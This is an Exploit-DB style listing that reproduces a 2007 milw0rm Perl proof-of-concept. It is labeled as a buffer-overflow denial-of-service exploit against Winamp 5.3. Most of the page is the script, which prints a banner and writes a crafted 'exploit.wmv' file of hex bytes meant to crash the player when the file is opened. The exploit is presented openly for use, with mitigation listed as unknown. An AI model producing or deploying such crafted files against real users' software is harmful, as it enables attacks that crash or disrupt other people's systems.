header-logo
Suggest Exploit
vendor:
Winamp Media Player
by:
UniquE-Key{UniquE-Cracker}
N/A
CVSS
N/A
Buffer Overflow - DOS
CWE
Product Name: Winamp Media Player
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)

This is a buffer overflow exploit for Winamp Media Player version 5.3. It allows an attacker to cause a denial of service (DOS) by creating a specially crafted WMV file that triggers the overflow.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/perl

# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------

# Type :

# Buffer Overflow - DOS

# Release Date :

# {2007-04-16}

# Product / Vendor :

# Winamp Media Player

# http://www.winamp.com/

# Exploit :

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

{

    print "\n-----------------------------------\n";

    print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";

    print "-----------------------------------\n";

    print "\nUniquE-Key{UniquE-Cracker}\n";

    print "UniquE[at]UniquE-Key.ORG\n";

    print "http://UniquE-Key.ORG\n";

    print "\n-----------------------------------\n";

    print "\nExploit Completed!\n";

    print "\n-----------------------------------\n";

}

open(wmv, ">./exploit.wmv");

print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".

print wmv "\x4D\x54\x68\x64";

close(wmv);

# Tested :

# --- WINAMP 5.3 Version ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-19]